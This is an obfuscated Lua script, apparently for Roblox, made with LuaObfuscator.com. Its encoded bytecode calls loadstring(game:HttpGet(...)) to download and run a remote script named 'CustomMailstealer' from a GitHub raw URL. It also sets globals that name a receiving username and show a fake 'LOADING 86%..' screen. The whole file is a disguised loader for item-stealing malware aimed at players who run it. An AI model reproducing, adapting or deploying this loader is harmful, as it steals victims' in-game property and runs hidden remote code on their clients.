--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v82=(v31/((5 -(3 -0))^(v32-(2 -1))))%((3 -(1066 -(68 + 997)))^(((v33-(1271 -(226 + 1044))) -(v32-(2 -1))) + ((3823 -2945) -(282 + 595)))) ;return v82-(v82%(620 -(555 + 64))) ;else local v83=2^(v32-(1638 -(1523 + 114))) ;return (((v31%(v83 + v83))>=v83) and (932 -(857 + 74))) or (0 + 0) ;end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + 3 );v19=v19 + (121 -(32 + 85)) ;return (v37 * 16777216) + (v36 * (64226 + 1310)) + (v35 * (57 + 199)) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0 -0 ;local v39;local v40;local v41;local v42;local v43;local v44;while true do if (v38==(1 + 2)) then local v88=0 -0 ;while true do if (v88==(0 + 0)) then for v100=1 + 0 ,v24() do v40[v100-1 ]=v29();end return v42;end end end if (v38~=(2 -1)) then else local v89=0 + 0 ;while true do if ((1130 -(87 + 1043))==v89) then v42={v39,v40,nil,v41};v43=v24();v89=1181 -(1123 + 57) ;end if (v89==(1 + 0)) then v44={};v38=256 -(163 + 91) ;break;end end end if (v38==2) then local v90=1930 -(1869 + 61) ;while true do if (v90==(1 + 0)) then for v102=1,v24() do local v103=0 -0 ;local v104;local v105;while true do if (v103==1) then while true do if (v104==0) then v105=v22();if (v21(v105,1 -0 ,1)==(0 + 0)) then local v170=0;local v171;local v172;local v173;local v174;local v175;while true do if (v170~=(1 -0)) then else local v195=0;while true do if ((1 + 0)==v195) then v170=2;break;end if (v195==(1474 -(1329 + 145))) then v173=nil;v174=nil;v195=972 -(140 + 831) ;end end end if (v170~=2) then else v175=nil;while true do if (v171~=(1851 -(1409 + 441))) then else local v199=0;local v200;while true do if (v199==(718 -(15 + 703))) then v200=0 + 0 ;while true do if (v200==0) then v174=nil;v175=nil;v200=439 -(262 + 176) ;end if (v200~=1) then else v171=2;break;end end break;end end end if (0~=v171) then else local v201=1721 -(345 + 1376) ;while true do if (v201~=1) then else v171=1;break;end if (v201~=(688 -(198 + 490))) then else v172=0 -0 ;v173=nil;v201=2 -1 ;end end end if ((1208 -(696 + 510))~=v171) then else while true do if (v172==(0 -0)) then local v202=1262 -(1091 + 171) ;local v203;while true do if (v202~=0) then else v203=0;while true do if (v203~=(1 + 0)) then else v172=3 -2 ;break;end if (v203==(0 -0)) then v173=v21(v105,376 -(123 + 251) ,14 -11 );v174=v21(v105,4,6);v203=699 -(208 + 490) ;end end break;end end end if (1~=v172) then else local v204=0 + 0 ;local v205;while true do if (v204==(0 + 0)) then v205=836 -(660 + 176) ;while true do if (v205==(0 + 0)) then local v211=0;while true do if (v211==(202 -(14 + 188))) then v175={v23(),v23(),nil,nil};if (v173==0) then local v214=0 + 0 ;local v215;while true do if ((0 -0)~=v214) then else v215=0 -0 ;while true do if (v215~=0) then else v175[3]=v23();v175[11 -7 ]=v23();break;end end break;end end elseif (v173==1) then v175[3]=v24();elseif (v173==(2 + 0)) then v175[2 + 1 ]=v24() -(2^(412 -(115 + 281))) ;elseif (v173==(6 -3)) then local v224=0 + 0 ;local v225;while true do if ((0 -0)==v224) then v225=0 -0 ;while true do if (v225==(867 -(550 + 317))) then v175[3 -0 ]=v24() -(2^16) ;v175[4 -0 ]=v23();break;end end break;end end end v211=2 -1 ;end if (1~=v211) then else v205=1;break;end end end if (v205==1) then v172=287 -(134 + 151) ;break;end end break;end end end if (v172~=2) then else local v206=0;local v207;while true do if (v206~=0) then else v207=0;while true do if (v207==1) then v172=3;break;end if (v207~=(1665 -(970 + 695))) then else local v212=0;local v213;while true do if (v212==0) then v213=0;while true do if (v213==(1 -0)) then v207=1;break;end if (v213==(1990 -(582 + 1408))) then if (v21(v174,3 -2 ,1 -0 )~=(3 -2)) then else v175[1826 -(1195 + 629) ]=v44[v175[2 -0 ]];end if (v21(v174,243 -(187 + 54) ,782 -(162 + 618) )==(1 + 0)) then v175[3]=v44[v175[2 + 1 ]];end v213=1;end end break;end end end end break;end end end if (v172==(6 -3)) then if (v21(v174,4 -1 ,3)~=(1 + 0)) then else v175[4]=v44[v175[1640 -(1373 + 263) ]];end v39[v102]=v175;break;end end break;end end break;end if (v170~=(1000 -(451 + 549))) then else local v196=0 + 0 ;while true do if (v196~=0) then else v171=0;v172=nil;v196=1 -0 ;end if (1==v196) then v170=1;break;end end end end end break;end end break;end if (v103==(0 -0)) then local v107=1384 -(746 + 638) ;while true do if (v107==1) then v103=1 + 0 ;break;end if (v107~=(0 -0)) then else v104=341 -(218 + 123) ;v105=nil;v107=1582 -(1535 + 46) ;end end end end end v38=3;break;end if (v90==(0 + 0)) then local v99=0 + 0 ;while true do if (v99~=1) then else v90=1;break;end if (v99==(560 -(306 + 254))) then for v108=1 + 0 ,v43 do local v109=0;local v110;local v111;local v112;while true do if (0==v109) then v110=0 -0 ;v111=nil;v109=1468 -(899 + 568) ;end if (v109==(1 + 0)) then v112=nil;while true do if (v110==1) then if (v111==1) then v112=v22()~=0 ;elseif (v111==(4 -2)) then v112=v25();elseif (v111~=3) then else v112=v26();end v44[v108]=v112;break;end if (v110==0) then local v183=603 -(268 + 335) ;while true do if (v183~=1) then else v110=291 -(60 + 230) ;break;end if (v183==0) then v111=v22();v112=nil;v183=573 -(426 + 146) ;end end end end break;end end end v42[1 + 2 ]=v22();v99=1;end end end end end if (v38==(1456 -(282 + 1174))) then local v91=811 -(569 + 242) ;while true do if (v91==0) then v39={};v40={};v91=1;end if (v91==1) then v41={};v38=2 -1 ;break;end end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=0 + (0 -0) ;local v46;local v47;local v48;local v49;local v50;local v51;while true do if (v45==((2925 -(106 + 1794)) -(224 + 482 + 318))) then v48=1252 -(721 + 530) ;v49=(v21(v47,1,1291 -(945 + 326) ) * (((2 + 2) -2)^32)) + v46 ;v45=2 + 0 ;end if (v45==(703 -(271 + 429))) then if (v50==(0 + 0)) then if (v49==(1500 -(1408 + 92))) then return v51 * 0 ;else v50=1087 -(461 + 625) ;v48=1288 -(993 + (870 -575)) ;end elseif (v50==((289 -182) + 1940)) then return ((v49==(1171 -(418 + 753))) and (v51 * ((1 + 0)/(0 + 0)))) or (v51 * NaN) ;end return v8(v51,v50-(300 + 723) ) * (v48 + (v49/(2^(14 + (152 -(4 + 110)))))) ;end if ((529 -(406 + 123))==v45) then v46=v24();v47=v24();v45=1770 -(1749 + 20) ;end if (v45==2) then v50=v21(v47,21,8 + 23 );v51=((v21(v47,32)==(1323 -(1249 + 73))) and  -(1 + 0)) or (1146 -(466 + 679)) ;v45=6 -3 ;end end end v26=nil;function v26(v52)local v53;if  not v52 then local v84=584 -(57 + 527) ;while true do if (v84==0) then v52=v24();if (v52==((3181 -1754) -(41 + 1386))) then return "";end break;end end end v53=v3(v16,v19,(v19 + v52) -((301 -197) -(17 + 86)) );v19=v19 + v52 ;local v54={};for v66=1 + 0 , #v53 do v54[v66]=v2(v1(v3(v53,v66,v66)));end return v6(v54);end v18=5;end if (v18==2) then function v22()local v55=166 -(122 + 44) ;local v56;while true do if (v55==0) then v56=v1(v16,v19,v19);v19=v19 + ((1 + 0) -0) ;v55=1;end if (v55==(3 -2)) then return v56;end end end v23=nil;function v23()local v57,v58=v1(v16,v19,v19 + 1 + 1 );v19=v19 + 2 ;return (v58 * (518 -262)) + v57 ;end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then v20=v0(v3(v59,1,1));return "";else local v85=v2(v0(v59,16));if v20 then local v92=v5(v85,v20);v20=nil;return v92;else return v85;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=v60[1];local v64=v60[2];local v65=v60[3];return function(...)local v68=v63;local v69=v64;local v70=v65;local v71=v28;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v87=0;while true do if (v87==0) then v80=v68[v72];v81=v80[1];v87=1;end if (v87==1) then if (v81<=5) then if (v81<=2) then if (v81<=0) then local v113=v80[2];local v114,v115=v71(v78[v113](v13(v78,v113 + 1 ,v80[3])));v73=(v115 + v113) -1 ;local v116=0;for v126=v113,v73 do v116=v116 + 1 ;v78[v126]=v114[v116];end elseif (v81==1) then do return;end else local v129=0;local v130;local v131;while true do if (v129==1) then v78[v130 + 1 ]=v131;v78[v130]=v131[v80[4]];break;end if (v129==0) then v130=v80[2];v131=v78[v80[3]];v129=1;end end end elseif (v81<=3) then local v117=0;local v118;local v119;local v120;local v121;local v122;while true do if (v117==7) then v80=v68[v72];v72=v80[3];break;end if (v117==1) then v72=v72 + 1 ;v80=v68[v72];if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v117=2;end if (v117==5) then v118=0;for v176=v122,v73 do local v177=0;while true do if (v177==0) then v118=v118 + 1 ;v78[v176]=v119[v118];break;end end end v72=v72 + 1 ;v80=v68[v72];v122=v80[2];v117=6;end if (6==v117) then v78[v122]=v78[v122](v13(v78,v122 + 1 ,v73));v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]();v72=v72 + 1 ;v117=7;end if (v117==0) then v118=nil;v119,v120=nil;v121=nil;v122=nil;v62[v80[3]]=v78[v80[2]];v117=1;end if (4==v117) then v72=v72 + 1 ;v80=v68[v72];v122=v80[2];v119,v120=v71(v78[v122](v13(v78,v122 + 1 ,v80[3])));v73=(v120 + v122) -1 ;v117=5;end if (v117==3) then v78[v122 + 1 ]=v121;v78[v122]=v121[v80[4]];v72=v72 + 1 ;v80=v68[v72];v78[v80[2]]=v80[3];v117=4;end if (v117==2) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;v80=v68[v72];v122=v80[2];v121=v78[v80[3]];v117=3;end end elseif (v81==4) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end else v72=v80[3];end elseif (v81<=8) then if (v81<=6) then v62[v80[3]]=v78[v80[2]];elseif (v81==7) then local v133=v80[2];v78[v133]=v78[v133](v13(v78,v133 + 1 ,v73));else v78[v80[2]]=v80[3];end elseif (v81<=9) then local v125=0;while true do if (2==v125) then v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v125=3;end if (v125==0) then v62[v80[3]]=v78[v80[2]];v72=v72 + 1 ;v80=v68[v72];v125=1;end if (v125==1) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v125=2;end if (4==v125) then v72=v80[3];break;end if (3==v125) then v78[v80[2]]=v80[3];v72=v72 + 1 ;v80=v68[v72];v125=4;end end elseif (v81>10) then v78[v80[2]]();elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v62;else v78[v80[2]]=v62[v80[3]];end v72=v72 + 1 ;break;end end end end;end return v30(v29(),{},v17)(...);end end end v15("LOL!0C3O00028O00026O00F03F030D3O00475F4D61696C6D652O73616765030C3O007520676F74206D652062726F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269437573746F6D2F6D61696E2F437573746F6D4D61696C737465616C657203083O00557365726E616D6503063O007A65636D6972030F3O00475F4C6F6164696E675363722O656E030D3O004C4F4144494E47203836252O2E001E3O0012083O00013O0026043O000D000100020004053O000D0001001208000100043O001203000100033O00122O000100053O00122O000200063O00202O00020002000700122O000400086O000200046O00013O00024O00010001000100044O001D00010026043O0001000100010004053O00010001001208000100013O00260400010014000100020004053O001400010012083O00023O0004053O0001000100260400010010000100010004053O001000010012080002000A3O001209000200093O00122O0002000C3O00122O0002000B3O00122O000100023O00044O001000010004053O000100012O00013O00017O00",v9(),...);
